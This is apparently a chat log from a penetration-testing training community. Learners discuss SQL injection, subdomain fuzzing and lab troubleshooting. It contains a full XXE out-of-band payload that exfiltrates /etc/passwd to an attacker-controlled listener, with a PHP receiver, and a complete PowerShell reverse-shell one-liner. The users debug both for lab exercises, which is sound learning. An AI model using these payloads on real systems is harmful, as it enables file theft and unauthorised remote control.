isn't it the case for wordpress, joomla, and drupal too? Admin access
typical, <excuse> - <ask about something illegal>
it's pretty much for all applications meant to be run internally
I mean these apps are accessible to anyone
yes but tomcat is meant to be internally facing, not externally facing
that's why it's so easy to pwn
Will it be ubuntu? hour htb academy username? I really appreciate the help!
our*
cool
ye
most of the time it's weakly configured due to it being internal
so most people assume "eh it's internal, no way they'll find it"
guys anyone that can explain to me how to find possible suffix/prefix in a real world scenario in sql injection, please?
easy if it's whitebox since you have access to source code
if blackbox, you need to determine how the SQL query is structured
burpsuite intruder and sqli wordlist
unless you have a more specific question
and the error log of sqlmap of the payload can help me in that?
not familiar with the error log so i can't say
but it's more general, no?
whats more general?
ah ok thanks, because i thought that for example, if i see a syntax error, i could infer how the query is structured
if you have access to error output, you can probably figure it out
yeah i mean once you get a specific response you know you've broken the sql query and from there you exploit it right
tbh most of the time i just spray the user controlled input with a sqli wordlist
but if there isn't any error output, it's a lot more difficult
right
ok thanks, so it's more difficult to predict these things if we are on a blackbox testing, right?
that's illegal

i would say, if i don't have the source code, and no error output, it's more difficult to infer the structure of query
Yup
oh yeah that's very true
it might be something you'd table until you couldnt find anything else
and have some degree of confidence its the right path to go down
But thankfully people have done a lot of the hard work for you
Like PayloadAllTheThings
referring to the sqli payload wordlists?
yep
but these types of payloads, are they not already included in sqlmap?
Will the spawning machines ever be fixed?
I've had this happen a few times when doing modules
It's a handy cheatsheet
ah ok thanks so much @fathom pendant @hard matrix @dim wolf
its good to do manual enum too if your automated stuff doesn't pan out
okok thanks, however it's a methodology that requires a lot of time. So i think i can test it as a last resort
where can i find the first hacking module at? im new
I'm currently doing the last part of the "Web Attacks - Blind Data Exfiltration" module. I noticed in this section that the supposed content of the xxe.dtd file has not been mentioned? Do I have to delete the contents of the file to make it work?
It's just a thought since the content was for a different section of the module but currently I have to reference it in this section:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
The only file that I create for this section is this syntax:
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
The dtd is given at the start of the section
Is it this one?
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
Yer
I was confused, thanks for clarifying.
During the xxe sections I named the separate DTDs according to the section
And adjusted accordingly
That's a helpful tip. Thank you.
f**ck thick client application
2 days I've been working on it 
ah
decompiling the java and recompiling is a bitch ain't it
i heavily suggest the 'fatty' walkthrough by ippsec
as that's the box this section is lifted off of
as you can note the box is rated insane
I had to de/recompile it 5 times to finally understand that it was necessary to link the 2 operations of traversal and file download to download the server.
yeah if you're trying to follow the reading...it SUCKS at explaining
it's why you'll have better luck following along with a writeup of the box 'fatty' as ippsec actually explains things
I think 0xdf also has a writeup for it
thanks I'll try to do it again on this box when I have time.
but yeah
that's by far the worst section in all the modules ever, and that's not even a hot take
yeah I admit, in real life when you succeed you say to yourself "ah yeah, cool, in fact", but damn, the reasoning you have to have to think of decompiling the program in order to modify some functions from the source, then recompile. I would never have believed it was possible
i say it's terrible because by the end you don't even feel satisfied when you figure it out/get to the end
you're just "thank god that's over"
like the LEAST satisfying section
I laughed out loud ahahahah, I swear I thanked him 10 times.
IMO the instructions in the section are WAY too fast-paced
yeah, they should do something more detailed for noobs like me; it would avoid spending 2 days on it
but well it’s just a bad nightmare we go ahead ahah
I've had ffuf running for like 1.5 hours on intro to web, subdomain bruteforcing
Is there a specific word list they want?
It shouldn't take 1.5 hours
That should've been your first hint something was wrong
that's probably a little too long for a bruteforce
someone mentioned earlier to use the top-x-million 3 wordlists in seclists
also make sure you increase threads
Yep
Also with ffuf for subdomains against a private (10.129.x.x) target you need to use -H "Host: FUZZ.domain.htb"
As well as targets that may not be running DNS
Well tbf I just walked away for a bit LOL
This just has the inlanefreight.com which is a public address
Okay ill give that a try
Yeah it never got through the list to begin with cause it's been so slow
HTB operates a good bit different from offsec so been a bit jarring
Anyone know if you can buy cod points on here
Also sometimes switching your networking mode from NAT --> bridged also fixes it
No
You buy cod points from the cod store
Hth
Hi
I'm having a bit of a problem with this reverse shell that htb supplied
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
when I run this on the target machine (with the modified IP ofc) it gives errors
what errors
-
~
Unexpected token ')' in expression or statement.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ExpectedExpression
how are you using this reverse shell payload
what is the context
im trying to establish a reverse shell with the victim and my machine
that is the reverse shell payload that was given to me by htb
well of course you are but that doesn't tell me anything
what module is this
section name, question, ..
run this from cmd
not from powershell
shells and payloads module (reverse shells)
thank u let me try
thanks it worked...could u pls explain why it worked from cmd and not powershell 😅
running in cmd or encoding the payload should work
thanks, could u pls explain why
because that's what the payload is for, cmd
ahh I see
powershell handles specific characters differently than cmd
ohh
^
thanks a lot guys :))
that's why i always use encoded powershell payload
you can likely change the language in the revshells website to be for powershell specifically
but the revshells payload is from the perspective of you running the commands (by default) in cmd
runs fine in powershell
¯\_(ツ)_/¯
last time i checked at least
been a hot minute though since i've done that module to test
i'll test it out on my own machine real quick
i am trying to get a reverse shell from my windows machine using the reverse shell payload that I pasted earlier and im trying from cmd but it gives errors again 😅
At line:1 char:485
+ ... .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
hm TIL
it's just certain things that don't work cross cmd/powershell (like quotes, braces,...)
u guys know why ?
nope
something tells me though it's because it couldn't connect to your listener
so it errors out
¯\_(ツ)_/¯
Who here uses obsidian?
yea wadup
depends on networking of your vm <-> host machine
me
ahh I see
so its like the bridged/NAT network etc?
some networking modes don't allow it
yeah if you're using nat networking (default) the guest machine (vm) will have an ip address on another subnet
bridged will have an ip from on same subnet as host iirc
but i use vmware workstation, not sure what you're using
ohh ok, Im using vbox
same concept applies in most hypervisors really
really need to setup a proper homelab
It's a connection related issue
I wrote a script to scrape all of the modules and sections from HTBA for taking notes (wish I did this years ago), to create an obsidian vault.
Next step is linking them and tagging. And going back through almost half of the content I have already covered to take substantial notes. Two questions. Is there an api for the academy so I don't have to keep using that beautiful soup? What do you find the best strategy for keeping your notes linked and tagged in obsidian?
ahh I see thanks
this will not be helpful tbh
my notes are a garbled spaghetti mess that i've linked along the way when i came across like-topics
You guys take notes?
but also if you haven't paid for the module, then that's likely theft of paid content and can get you in a ton of trouble
there's no public API
as stated earlier
you'd have to dig around and find it
don't think they're suggesting that at all - they're just grabbing the material they've already paid for
as long as they're not distributing it, i don't see the problem.
the wording is vague
i have tons of screenshots from the module material
didn't pay = pirating; doesn't matter if they're not distributing
if they paid for the content that's a different story
failure on htb's part if he's even able to access modules he hasn't paid cubes for
i believe if you try and interact with an academy page you haven't paid for though it redirects you to the overview if you haven't paid for it
I dont think u can scrape modules which u dont have access to
yeah, I just take my notes as is and I brush up on them in the future
as you're not actually learning anything from scraping; just copy/paste
If you have the ability to continously learn...
but that's my 2 cents
if you want to copy/paste all the modules you own go for it
I agree
vague not sure what you mean
but yeah i'd rec just taking notes along the way instead of scraping the module material
and linking notes with # and [] in obsidian when theres cross-referential topics
a lot of the topics will overlap and a good amount of my notes have built off of itself like this
I think you missed my point. Sorry for that. I scraped the titles of all the modules and urls. I then did the same for all the sections of the modules to create an obsidian vault to take notes.
yeah my point still stands, you should be doing it as you go
ooh makes sense
Its a template for the whole academy... yes fill it in as you go.
imo, still dumb
but if it works for you
¯\_(ツ)_/¯
i don't want to populate my vault with modules I haven't touched yet
just adds lots of clutter
Sorry about the shit video. Maybe you get what I'm trying to say.
oh no i get it
i think its stupid
but if it works for you, more power to you
I prefer to have my vault populated with modules that I've actually done
meanwhile: spaghetti
I'm not saying it does.
¯\_(ツ)_/¯
again
as long as you're not breaking some TOS by scraping pages that you shouldn't have access to
more power to you
just not my cup of tea
as it can throw in a LOT of clutter for no real reason
That's the funny thing. I have done quite a few. At least I think🤔
see
that is my point in standing
now
I can see the point in creating a tool to grab what you're currently doing
that would be interesting
and populate your vault/notes
but having it grab everything even stuff you haven't done like t3/4 modules
is just overkill
imo what you should do is scrape the tier info and actually pre-sort them into folders that way
hmm vpn off, swapped from nat to bridged still getting about 2 req a second
I believe obsidian allows for symlinking as well
dunno what to tell ya bud ¯\_(ツ)_/¯

you don't need recursion my guy
you actually do, but it doesnt matter because its not getting that far anyways
you're fuzzing for domains not directory
trust me on this one. you don't
also -e == extensions
hmm question literally says to check
yeah i trimmed some stuff out when i copy pasted
wait
you're using a directory list to fuzz subdomains
there's a whole lotta shit not right here
usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
^ is what im using
the question asks you to look for the su* subdomain yes?
subdomains
let me grab the actual command lol i was just posting for syntax
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://FUZZ.inlanefreight.com -recursion-depth 5
again don't need recursion
sure
but i digress at this point
thats just what ive been using, sorry to make it confusing lol
the issue here is that something is throttling your connection
have you tried using the commands and wordlist the module showed?
yeah I did
it made me want to do all my notes again 😭
the issue is his connection is being throttled
Fwiw the instances themselves tend to get bogged down and shitty occasionally. If you suspect the box itself is bad change vpn regions and redownload your key
it's not a box
it's a hosted website
^
kinda wondering if my isp could be docking it
no
Same... but I think its a good way I seal it in the brain.
to make these notes? yes, I had the same discussion yesterday with marcie and it's true that when you go back over your notes from 7 months ago, you want to restructure everything because you have a way of seeing things.
but 10 months to redo all my CPTS notes will take me 2 months but i'm lazy 🥲
You rekindle ideas when looking over old notes.
I have a lot of notes scattered everywhere. I created that obsidian vault as a framework to put all of my notes.
my note taking vastly improved over time, that was my motivation to make new notes
if you all say it, I think it's a good thing, so I'll do it again. 🙂
Hello
Hello, I'm from Brazil, learning a little cybersecurity. I hope to learn a lot from you
good luck